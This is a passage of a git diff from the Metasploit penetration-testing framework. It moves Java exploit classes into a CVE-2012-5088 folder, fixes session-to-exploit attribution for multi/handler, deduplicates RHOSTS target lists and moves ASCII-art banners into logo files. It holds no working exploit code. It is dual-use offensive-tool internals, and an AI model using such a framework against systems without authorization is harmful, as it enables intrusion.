../../../../data/exploits/cve-2013-0422/ - mv B.class ../../../../data/exploits/cve-2013-0422/ + mv Exploit.class ../../../../data/exploits/cve-2012-5088/ + mv B.class ../../../../data/exploits/cve-2012-5088/ clean: rm -rf *.class diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb index a8cfe55431..7e0bc736ba 100644 --- a/lib/msf/core/db.rb +++ b/lib/msf/core/db.rb @@ -679,8 +679,8 @@ class DBManager # In the case of multi handler we cannot yet determine the true # exploit responsible. But we can at least show the parent versus # just the generic handler: - if session and session.via_exploit == "exploit/multi/handler" - sess_data[:via_exploit] = sess_data[:datastore]['ParentModule'] + if session and session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule'] + sess_data[:via_exploit] = sess_data[:datastore]['ParentModule'] end s = ::Mdm::Session.new(sess_data) @@ -696,9 +696,9 @@ class DBManager mod = framework.modules.create(session.via_exploit) - if session.via_exploit == "exploit/multi/handler" - mod_fullname = sess_data[:datastore]['ParentModule'] - mod_name = ::Mdm::ModuleDetail.find_by_fullname(mod_fullname).name + if session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule'] + mod_fullname = sess_data[:datastore]['ParentModule'] + mod_name = ::Mdm::ModuleDetail.find_by_fullname(mod_fullname).name else mod_name = mod.name mod_fullname = mod.fullname @@ -720,7 +720,7 @@ class DBManager vuln = framework.db.report_vuln(vuln_info) - if session.via_exploit == "exploit/multi/handler" + if session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule'] via_exploit = sess_data[:datastore]['ParentModule'] else via_exploit = session.via_exploit diff --git a/lib/msf/ui/banner.rb b/lib/msf/ui/banner.rb index c30dc8cdf6..5f53bef07e 100644 --- a/lib/msf/ui/banner.rb +++ b/lib/msf/ui/banner.rb @@ -10,301 +10,52 @@ module Ui module Banner Logos = - [ -%Q{ -%whiCall trans opt: received. 2-19-98 13:24:18 REC:Loc - - Trace program: running - - wake up, Neo... - %bldthe matrix has you%clr - follow the white rabbit. - - knock, knock, Neo. - - (`. ,-, - ` `. ,;' / - `. ,'/ .' - `. X /.' - .-;--''--.._` ` ( - .' / ` - , ` ' Q ' - , , `._ \\ - ,.| ' `-.;_' - : . ` ; ` ` --,.._; - ' ` , ) .' - `._ , ' /_ - ; ,''-,;' ``- - ``-..__``--` -%clr}, - -%Q{%whi - _---------. - .' ####### ;." - .---,. ;@ @@`; .---,.. -." @@@@@'.,'@@ @@@@@',.'@@@@ ". -'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @; - `.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .' - "--'.@@@ -.@ @ ,'- .'--" - ".@' ; @ @ `. ;' - |@@@@ @@@ @ . - ' @@@ @@ @@ , - `.@@@@ @@ . - ',@@ @ ; _____________ - ( 3 C ) /|___ / Metasploit! \\ - ;@'. __*__,." \\|--- \\_____________/ - '(.,...."/ -%clr}, -' -%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%% % %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%% -%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %% -%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%% -%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%% -%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% % -%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%% -%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%% -%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -', -' - _ _ -/ \ /\ __ _ __ /_/ __ -| |\ / | _____ \ \ ___ _____ | | / \ _ \ \ -| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -| -|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_ - |/ |____/ \___\/ /\ \\\\___/ \/ \__| |_\ \___\ -', -%Q{ -%whiIIIIII %reddTb.dTb%clr _.---._ -%whi II %red4' v 'B%clr .'"".'/|\`.""'. -%whi II %red6. .P%clr : .' / | \ `. : -%whi II %red'T;. .;P'%clr '.' / | \ `.' -%whi II %red'T; ;P'%clr `. / | \ .' -%whiIIIIII %red'YvP'%clr `-.__|__.-' - -I love shells --egypt -}, -' - , , - / \ - ((__---,,,---__)) - (_) O O (_)_________ - \ _ / |\ - o_o \ M S F | \ - \ _____ | * - ||| WW||| - ||| ||| -', -' -# cowsay++ - ____________ -< metasploit > - ------------ - \ ,__, - \ (oo)____ - (__) )\ - ||--|| * -', - - -'%clr - ______________________________________________________________________________ -| | -| %bld3Kom SuperHack II Logon%clr | -|______________________________________________________________________________| -| | -| | -| | -| User Name: [ %redsecurity%clr ] | -| | -| Password: [ ] | -| | -| | -| | -| %bld[ OK ]%clr | -|______________________________________________________________________________| -| | -|______________________________________________________________________________| -%clr -', - - -'%clr - ______________________________________________________________________________ -| | -| %bld%grnMETASPLOIT CYBER MISSILE COMMAND V4%clr | -|______________________________________________________________________________| - %yel\%clr %yel/%clr %yel/%clr - %yel\%clr . %yel/%clr %yel/%clr x - %yel\%clr %yel/%clr %yel/%clr - %yel\%clr %yel/%clr + %yel/%clr - %yel\%clr + %yel/%clr %yel/%clr - * %yel/%clr %yel/%clr - %yel/%clr . %yel/%clr - X %yel/%clr %yel/%clr X - %yel/%clr %red###%clr - %yel/%clr %red# %bld%%clr%red #%clr - %yel/%clr %red###%clr - . %yel/%clr - . %yel/%clr . %red*%clr . - %yel/%clr - * - + %red*%clr - - %bld^%clr -#### __ __ __ ####### __ __ __ #### -#### %yel/%clr %yel\%clr %yel/%clr %yel\%clr %yel/%clr %yel\%clr ########### %yel/%clr %yel\%clr %yel/%clr %yel\%clr %yel/%clr %yel\%clr #### -################################################################################ -################################################################################ -# %bldWAVE 4%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr # -################################################################################ -%clr -', - - -' -%clr%whi -Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f -EFLAGS: 00010046 -eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001 -esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60 -ds: 0018 es: 0018 ss: 0018 -Process Swapper (Pid: 0, process nr: 0, stackpage=80377000) - -%bld -Stack: 90909090990909090990909090 - 90909090990909090990909090 - 90909090.90909090.90909090 - 90909090.90909090.90909090 - 90909090.90909090.09090900 - 90909090.90909090.09090900 - .......................... - cccccccccccccccccccccccccc - cccccccccccccccccccccccccc - ccccccccc................. - cccccccccccccccccccccccccc - cccccccccccccccccccccccccc - .................ccccccccc - cccccccccccccccccccccccccc - cccccccccccccccccccccccccc - .......................... - ffffffffffffffffffffffffff - ffffffff.................. - ffffffffffffffffffffffffff - ffffffff.................. - ffffffff.................. - ffffffff.................. -%clr - -%yelCode: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00%clr -Aiee, Killing Interrupt handler -%redKernel panic: Attempted to kill the idle task! -In swapper task - not syncing -%clr -', -' -%clr -%bluMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM%clr -%bluMMMMMMMMMMM MMMMMMMMMM%clr -%bluMMMN$ vMMMM%clr -%bluMMMNl%clr %bldMMMMM MMMMM%clr %bluJMMMM%clr -%bluMMMNl%clr %bldMMMMMMMN NMMMMMMM%clr %bluJMMMM%clr -%bluMMMNl%clr %bldMMMMMMMMMNmmmNMMMMMMMMM%clr %bluJMMMM%clr -%bluMMMNI%clr %bldMMMMMMMMMMMMMMMMMMMMMMM%clr %blujMMMM%clr -%bluMMMNI%clr %bldMMMMMMMMMMMMMMMMMMMMMMM%clr %blujMMMM%clr -%bluMMMNI%clr %bldMMMMM MMMMMMM MMMMM%clr %blujMMMM%clr -%bluMMMNI%clr %bldMMMMM MMMMMMM MMMMM%clr %blujMMMM%clr -%bluMMMNI%clr %bldMMMNM MMMMMMM MMMMM%clr %blujMMMM%clr -%bluMMMNI%clr %bldWMMMM MMMMMMM MMMM#%clr %bluJMMMM%clr -%bluMMMMR%clr %bld?MMNM MMMMM%clr %blu.dMMMM%clr -%bluMMMMNm%clr %bld`?MMM MMMM`%clr %bludMMMMM%clr -%bluMMMMMMN%clr %bld?MM MM?%clr %bluNMMMMMN%clr -%bluMMMMMMMMNe%clr %bluJMMMMMNMMM%clr -%bluMMMMMMMMMMNm,%clr %blueMMMMMNMMNMM%clr -%bluMMMMNNMNMMMMMNx%clr %bluMMMMMMNMMNMMNM%clr -%bluMMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM%clr -%clr -', -' -%clr ######## # - ################# # - ###################### # - ######################### # - ############################ - ############################## - ############################### - ############################### - ############################## - # ######## # - %red##%clr %red###%clr #### ## - ### ### - #### ### - #### ########## #### - ####################### #### - #################### #### - ################## #### - ############ ## - ######## ### - ######### ##### - ############ ###### - ######## ######### - ##### ######## - ### ######### - ###### ############ - ####################### - # # ### # # ## - ######################## - ## ## ## ## -%clr -', -%Q{ - %whi+-------------------------------------------------------+ - %whi| METASPLOIT by Rapid7 | - %whi+---------------------------+---------------------------+ - %whi| %blu__________________ %whi| | - %whi| %yel==c%blu(______(%yelo%blu(______(_%yel() %whi| %grn|""""""""""""|======\[%red*** %whi| - %whi| %blu)%yel=%blu\\\ %whi| %grn| %whiEXPLOIT %grn\\ %whi| - %whi| %blu// \\\\ %whi| %grn|_____________\\_______ %whi| - %whi| %blu// \\\\ %whi| %grn|==\[%whimsf >%grn\]============\\ %whi| - %whi| %blu// \\\\ %whi| %grn|______________________\\ %whi| - %whi| %blu// %whiRECON %blu\\\\ %whi| %grn\\(@)(@)(@)(@)(@)(@)(@)/ %whi| - %whi| %blu// \\\\ %whi| %grn********************* %whi| - %whi+---------------------------+---------------------------+ - %whi| o O o | %yel\\'\\/\\/\\/'/ %whi| - %whi| o O | %yel)%whi======%yel( %whi| - %whi| o | %yel.' %whiLOOT %yel'. %whi| - %whi| %red|^^^^^^^^^^^^^^\|l%red___ %whi| %yel/ %grn_||__ %yel\\ %whi| - %whi| %red| %whiPAYLOAD %red|%whi""\\%red___, %whi| %yel/ %grn(_||_ %yel\\ %whi| - %whi| %red|________________|__|)__| %whi| %yel| %grn__||_) %yel| %whi| - %whi| %red|(@)(@)"""**|(@)(@)**|(@) %whi| %yel" %grn|| %yel" %whi| - %whi| %yel= = = = = = = = = = = = %whi| %yel'--------------' %whi| - %whi+---------------------------+---------------------------+%clr - %clr -},] - - - + %w{ + wake-up-neo.txt + cow-head.txt + r7-metasploit.txt + figlet.txt + i-heart-shells.txt + branded-longhorn.txt + cowsay.txt + 3kom-superhack.txt + missile-command.txt + null-pointer-deref.txt + metasploit-shield.txt + ninja.txt + workflow.txt + } # # Returns a random metasploit logo. # + + def self.readfile(fname) + base = File.expand_path(File.dirname(__FILE__)) + pathname = File.join(base, "logos", fname) + fdata = "<< Missing banner: #{fname} >>" + begin + raise ArgumentError unless File.readable?(pathname) + raise ArgumentError unless File.stat(pathname).size < 4096 + fdata = File.open(pathname) {|f| f.read f.stat.size} + rescue SystemCallError, ArgumentError + nil + end + return fdata + end + def self.to_s if ENV['GOCOW'] - case rand(2) + case rand(3) when 0 - Logos[1] + self.readfile Logos[1] when 1 - Logos[5] + self.readfile Logos[5] + when 2 + self.readfile Logos[6] end else - Logos[rand(Logos.length)] + self.readfile Logos[rand(Logos.length)] end end diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb index c590424829..b16fe1007b 100644 --- a/lib/msf/ui/console/command_dispatcher/db.rb +++ b/lib/msf/ui/console/command_dispatcher/db.rb @@ -205,6 +205,7 @@ class Db mode = :search delete_count = 0 + rhosts = [] host_ranges = [] search_term = nil @@ -241,7 +242,6 @@ class Db output = args.shift when '-R','--rhosts' set_rhosts = true - rhosts = [] when '-S', '--search' search_term = /#{args.shift}/nmi @@ -280,11 +280,6 @@ class Db range.each do |address| host = framework.db.find_or_create_host(:host => address) print_status("Time: #{host.created_at} Host: host=#{host.address}") - if set_rhosts - # only unique addresses - addr = (host.scope ? host.address + '%' + host.scope : host.address ) - rhosts << addr unless rhosts.include?(addr) - end end end return @@ -323,7 +318,7 @@ class Db tbl << columns if set_rhosts addr = (host.scope ? host.address + '%' + host.scope : host.address ) - rhosts << addr unless rhosts.include?(addr) + rhosts << addr end if mode == :delete host.destroy @@ -344,9 +339,11 @@ class Db # Finally, handle the case where the user wants the resulting list # of hosts to go into RHOSTS. - set_rhosts_from_addrs(rhosts) if set_rhosts + set_rhosts_from_addrs(rhosts.uniq) if set_rhosts print_status("Deleted #{delete_count} hosts") if delete_count > 0 } +## +## end def cmd_services_help @@ -366,10 +363,11 @@ class Db default_columns = ::Mdm::Service.column_names.sort default_columns.delete_if {|v| (v[-2,2] == "id")} - host_ranges = [] - port_ranges = [] + host_ranges = [] + port_ranges = [] + rhosts = [] delete_count = 0 - search_term = nil + search_term = nil # option parsing while (arg = args.shift) @@ -420,7 +418,6 @@ class Db output_file = ::File.expand_path(output_file) when '-R','--rhosts' set_rhosts = true - rhosts = [] when '-S', '--search' search_term = /#{args.shift}/nmi @@ -508,7 +505,7 @@ class Db tbl << columns if set_rhosts addr = (host.scope ? host.address + '%' + host.scope : host.address ) - rhosts << addr unless rhosts.include?(addr) + rhosts << addr end if (mode == :delete) @@ -529,7 +526,7 @@ class Db # Finally, handle the case where the user wants the resulting list # of hosts to go into RHOSTS. - set_rhosts_from_addrs(rhosts) if set_rhosts + set_rhosts_from_addrs(rhosts.uniq) if set_rhosts print_status("Deleted #{delete_count} services") if delete_count > 0 } @@ -680,6 +677,7 @@ class Db host_ranges = [] port_ranges = [] + rhosts = [] svcs = [] search_term = nil @@ -733,7 +731,6 @@ class Db end when "-R" set_rhosts = true - rhosts = [] when '-S', '--search' search_term = /#{args.shift}/nmi when "-u","--user" @@ -828,7 +825,7 @@ class Db end if set_rhosts addr = (cred.service.host.scope ? cred.service.host.address + '%' + cred.service.host.scope : cred.service.host.address ) - rhosts << addr unless rhosts.include?(addr) + rhosts << addr end creds_returned += 1 end @@ -842,7 +839,7 @@ class Db print_status("Wrote services to #{output_file}") end - set_rhosts_from_addrs(rhosts) if set_rhosts + set_rhosts_from_addrs(rhosts.uniq) if set_rhosts print_status "Found #{creds_returned} credential#{creds_returned == 1 ? "" : "s"}." } end @@ -873,6 +870,7 @@ class Db set_rhosts = false host_ranges = [] + rhosts = [] search_term = nil while (arg = args.shift) @@ -896,7 +894,6 @@ class Db types = typelist.strip().split(",") when '-R','--rhosts' set_rhosts = true - rhosts = [] when '-S', '--search' search_term = /#{args.shift}/nmi when '-h','--help' @@ -954,7 +951,7 @@ class Db msg << " host=#{note.host.address}" if set_rhosts addr = (host.scope ? host.address + '%' + host.scope : host.address ) - rhosts << addr unless rhosts.include?(addr) + rhosts << addr end end if (note.service) @@ -971,7 +968,7 @@ class Db # Finally, handle the case where the user wants the resulting list # of hosts to go into RHOSTS. - set_rhosts_from_addrs(rhosts) if set_rhosts + set_rhosts_from_addrs(rhosts.uniq) if set_rhosts print_status("Deleted #{delete_count} note#{delete_count == 1 ? "" : "s"}") if delete_count > 0 } @@ -1476,7 +1473,7 @@ class Db print_error("The database is not connected") return end - + print_status("Purging and rebuilding the module cache in the background...") framework.threads.spawn("ModuleCacheRebuild", true) do framework.db.purge_all_module_details @@ -1707,4 +1704,3 @@ end end end end - diff --git a/lib/msf/ui/logos/3kom-superhack.txt b/lib/msf/ui/logos/3kom-superhack.txt new file mode 100644 index 0000000000..e1fda38981 --- /dev/null +++ b/lib/msf/ui/logos/3kom-superhack.txt @@ -0,0 +1,19 @@ +%clr + ______________________________________________________________________________ +| | +| %bld3Kom SuperHack II Logon%clr | +|______________________________________________________________________________| +| | +| | +| | +| User Name: [ %redsecurity%clr ] | +| | +| Password: [ ] | +| | +| | +| | +| %bld[ OK ]%clr | +|______________________________________________________________________________| +| | +| http://metasploit.pro | +|______________________________________________________________________________|%clr diff --git a/lib/msf/ui/logos/branded-longhorn.txt b/lib/msf/ui/logos/branded-longhorn.txt new file mode 100644 index 0000000000..2b49662ab4 --- /dev/null +++ b/lib/msf/ui/logos/branded-longhorn.txt @@ -0,0 +1,9 @@ + , , + / \ + ((__---,,,---__)) + (_) O O (_)_________ + \ _ / |\ + o_o \ M S F | \ + \ _____ | * + ||| WW||| + ||| ||| diff --git a/lib/msf/ui/logos/cow-head.txt b/lib/msf/ui/logos/cow-head.txt new file mode 100644 index 0000000000..d7746ac219 --- /dev/null +++ b/lib/msf/ui/logos/cow-head.txt @@ -0,0 +1,16 @@ +%whi + _---------. + .' ####### ;." + .---,. ;@ @@`; .---,.. +." @@@@@'.,'@@ @@@@@',.'@@@@ ". +'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @; + `.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .' + "--'.@@@ -.@ @ ,'- .'--" + ".@' ; @ @ `. ;' + |@@@@ @@@ @ . + ' @@@ @@ @@ , + `.@@@@ @@ . + ',@@ @ ; _____________ + ( 3 C ) /|___ / Metasploit! \ + ;@'. __*__,." \|--- \_____________/ + '(.,...."/%clr diff --git a/lib/msf/ui/logos/cowsay.txt b/lib/msf/ui/logos/cowsay.txt new file mode 100644 index 0000000000..15512d4556 --- /dev/null +++ b/lib/msf/ui/logos/cowsay.txt @@ -0,0 +1,8 @@ +# cowsay++ + ____________ +< metasploit > + ------------ + \ ,__, + \ (oo)____ + (__) )\ + ||--|| * diff --git a/lib/msf/ui/logos/figlet.txt b/lib/msf/ui/logos/figlet.txt new file mode 100644 index 0000000000..972e7363c0 --- /dev/null +++ b/lib/msf/ui/logos/figlet.txt @@ -0,0 +1,6 @@ + _ _ +/ \ /\ __ _ __ /_/ __ +| |\ / | _____ \ \ ___ _____ | | / \ _ \ \ +| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -| +|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_ + |/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\ diff --git a/lib/msf/ui/logos/i-heart-shells.txt b/lib/msf/ui/logos/i-heart-shells.txt new file mode 100644 index 0000000000..5c1c64dd89 --- /dev/null +++ b/lib/msf/ui/logos/i-heart-shells.txt @@ -0,0 +1,8 @@ +%whiIIIIII %reddTb.dTb%clr _.---._ +%whi II %red4' v 'B%clr .'"".'/|\`.""'. +%whi II %red6. .P%clr : .' / | \ `. : +%whi II %red'T;. .;P'%clr '.' / | \ `.' +%whi II %red'T; ;P'%clr `. / | \ .' +%whiIIIIII %red'YvP'%clr `-.__|__.-' + +I love shells --egypt diff --git a/lib/msf/ui/logos/metasploit-shield.txt b/lib/msf/ui/logos/metasploit-shield.txt new file mode 100644 index 0000000000..41f1d971c7 --- /dev/null +++ b/lib/msf/ui/logos/metasploit-shield.txt @@ -0,0 +1,21 @@ +%clr +%bluMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM%clr +%bluMMMMMMMMMMM MMMMMMMMMM%clr +%bluMMMN$ vMMMM%clr +%bluMMMNl%clr %bldMMMMM MMMMM%clr %bluJMMMM%clr +%bluMMMNl%clr %bldMMMMMMMN NMMMMMMM%clr %bluJMMMM%clr +%bluMMMNl%clr %bldMMMMMMMMMNmmmNMMMMMMMMM%clr %bluJMMMM%clr +%bluMMMNI%clr %bldMMMMMMMMMMMMMMMMMMMMMMM%clr %blujMMMM%clr +%bluMMMNI%clr %bldMMMMMMMMMMMMMMMMMMMMMMM%clr %blujMMMM%clr +%bluMMMNI%clr %bldMMMMM MMMMMMM MMMMM%clr %blujMMMM%clr +%bluMMMNI%clr %bldMMMMM MMMMMMM MMMMM%clr %blujMMMM%clr +%bluMMMNI%clr %bldMMMNM MMMMMMM MMMMM%clr %blujMMMM%clr +%bluMMMNI%clr %bldWMMMM MMMMMMM MMMM#%clr %bluJMMMM%clr +%bluMMMMR%clr %bld?MMNM MMMMM%clr %blu.dMMMM%clr +%bluMMMMNm%clr %bld`?MMM MMMM`%clr %bludMMMMM%clr +%bluMMMMMMN%clr %bld?MM MM?%clr %bluNMMMMMN%clr +%bluMMMMMMMMNe%clr %bluJMMMMMNMMM%clr +%bluMMMMMMMMMMNm,%clr %blueMMMMMNMMNMM%clr +%bluMMMMNNMNMMMMMNx%clr %bluMMMMMMNMMNMMNM%clr +%bluMMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM%clr +%clr%bld http://metasploit.pro diff --git a/lib/msf/ui/logos/missile-command.txt b/lib/msf/ui/logos/missile-command.txt new file mode 100644 index 0000000000..5192490da2 --- /dev/null +++ b/lib/msf/ui/logos/missile-command.txt @@ -0,0 +1,30 @@ +%clr + ______________________________________________________________________________ +| | +| %bld%grnMETASPLOIT CYBER MISSILE COMMAND V4%clr | +|______________________________________________________________________________| + %yel\%clr %yel/%clr %yel/%clr + %yel\%clr . %yel/%clr %yel/%clr x + %yel\%clr %yel/%clr %yel/%clr + %yel\%clr %yel/%clr + %yel/%clr + %yel\%clr + %yel/%clr %yel/%clr + * %yel/%clr %yel/%clr + %yel/%clr . %yel/%clr + X %yel/%clr %yel/%clr X + %yel/%clr %red###%clr + %yel/%clr %red# %bld%%clr%red #%clr + %yel/%clr %red###%clr + . %yel/%clr + . %yel/%clr . %red*%clr . + %yel/%clr + * + + %red*%clr + + %bld^%clr +#### __ __ __ ####### __ __ __ #### +#### %yel/%clr %yel\%clr %yel/%clr %yel\%clr %yel/%clr %yel\%clr ########### %yel/%clr %yel\%clr %yel/%clr %yel\%clr %yel/%clr %yel\%clr #### +################################################################################ +################################################################################ +# %bldWAVE 4%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr # +################################################################################ + http://metasploit.pro%clr diff --git a/lib/msf/ui/logos/ninja.txt b/lib/msf/ui/logos/ninja.txt new file mode 100644 index 0000000000..70a5317a24 --- /dev/null +++ b/lib/msf/ui/logos/ninja.txt @@ -0,0 +1,30 @@ +%clr ######## # + ################# # + ###################### # + ######################### # + ############################ + ############################## + ############################### + ############################### + ############################## + # ######## # + %red##%clr %red###%clr #### ## + ### ### + #### ### + #### ########## #### + ####################### #### + #################### #### + ################## #### + ############ ## + ######## ### + ######### ##### + ############ ###### + ######## ######### + ##### ######## + ### ######### + ###### ############ + ####################### + # # ### # # ## + ######################## + ## ## ## ## + http://metasploit.pro%clr diff --git a/lib/msf/ui/logos/null-pointer-deref.txt b/lib/msf/ui/logos/null-pointer-deref.txt new file mode 100644 index 0000000000..38a532b541 --- /dev/null +++ b/lib/msf/ui/logos/null-pointer-deref.txt @@ -0,0 +1,37 @@ +%clr%whi +Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f +EFLAGS: 00010046 +eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001 +esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60 +ds: 0018 es: 0018 ss: 0018 +Process Swapper (Pid: 0, process nr: 0, stackpage=80377000) + +%bld +Stack: 90909090990909090990909090 + 90909090990909090990909090 + 90909090.90909090.90909090 + 90909090.90909090.90909090 + 90909090.90909090.09090900 + 90909090.90909090.09090900 + .......................... + cccccccccccccccccccccccccc + cccccccccccccccccccccccccc + ccccccccc................. + cccccccccccccccccccccccccc + cccccccccccccccccccccccccc + .................ccccccccc + cccccccccccccccccccccccccc + cccccccccccccccccccccccccc + .......................... + ffffffffffffffffffffffffff + ffffffff.................. + ffffffffffffffffffffffffff + ffffffff.................. + ffffffff.................. + ffffffff.................. +%clr + +%yelCode: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00%clr +Aiee, Killing Interrupt handler +%redKernel panic: Attempted to kill the idle task! +In swapper task - not syncing%clr diff --git a/lib/msf/ui/logos/r7-metasploit.txt b/lib/msf/ui/logos/r7-metasploit.txt new file mode 100644 index 0000000000..f650282597 --- /dev/null +++ b/lib/msf/ui/logos/r7-metasploit.txt @@ -0,0 +1,16 @@ +%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%% % %%%%%%%% %%%%%%%%%%% http://metasploit.pro %%%%%%%%%%%%%%%%%%%%%%%%% +%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%% +%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %% +%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%% +%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%% +%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% % +%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%% +%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%% +%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% diff --git a/lib/msf/ui/logos/test.rb b/lib/msf/ui/logos/test.rb new file mode 100644 index 0000000000..2a8e063414 --- /dev/null +++ b/lib/msf/ui/logos/test.rb @@ -0,0 +1,5 @@ + +here = File.expand_path(File.dirname(__FILE__)) + +puts "Hi I live #{here}!" + diff --git a/lib/msf/ui/logos/wake-up-neo.txt b/lib/msf/ui/logos/wake-up-neo.txt new file mode 100644 index 0000000000..1ee1779557 --- /dev/null +++ b/lib/msf/ui/logos/wake-up-neo.txt @@ -0,0 +1,26 @@ +%whiCall trans opt: received. 2-19-98 13:24:18 REC:Loc + + Trace program: running + + wake up, Neo... + %bldthe matrix has you%clr + follow the white rabbit. + + knock, knock, Neo. + + (`. ,-, + ` `. ,;' / + `. ,'/ .' + `. X /.' + .-;--''--.._` ` ( + .' / ` + , ` ' Q ' + , , `._ \ + ,.| ' `-.;_' + : . ` ; ` ` --,.._; + ' ` , ) .' + `._ , ' /_ + ; ,''-,;' ``- + ``-..__``--` + + http://metasploit.pro%clr diff --git a/lib/msf/ui/logos/workflow.txt b/lib/msf/ui/logos/workflow.txt new file mode 100644 index 0000000000..a470eebd24 --- /dev/null +++ b/lib/msf/ui/logos/workflow.txt @@ -0,0 +1,21 @@ + %whi+-------------------------------------------------------+ + %whi| METASPLOIT by Rapid7 | + %whi+---------------------------+---------------------------+ + %whi| %blu__________________ %whi| | + %whi| %yel==c%blu(______(%yelo%blu(______(_%yel() %whi| %grn|""""""""""""|======[%red*** %whi| + %whi| %blu)%yel=%blu\ %whi| %grn| %whiEXPLOIT %grn\ %whi| + %whi| %blu// \\ %whi| %grn|_____________\_______ %whi| + %whi| %blu// \\ %whi| %grn|==[%whimsf >%grn]============\ %whi| + %whi| %blu// \\ %whi| %grn|______________________\ %whi| + %whi| %blu// %whiRECON %blu\\ %whi| %grn\(@)(@)(@)(@)(@)(@)(@)/ %whi| + %whi| %blu// \\ %whi| %grn********************* %whi| + %whi+---------------------------+---------------------------+ + %whi| o O o | %yel\'\/\/\/'/ %whi| + %whi| o O | %yel)%whi======%yel( %whi| + %whi| o | %yel.' %whiLOOT %yel'. %whi| + %whi| %red|^^^^^^^^^^^^^^|l%red___ %whi| %yel/ 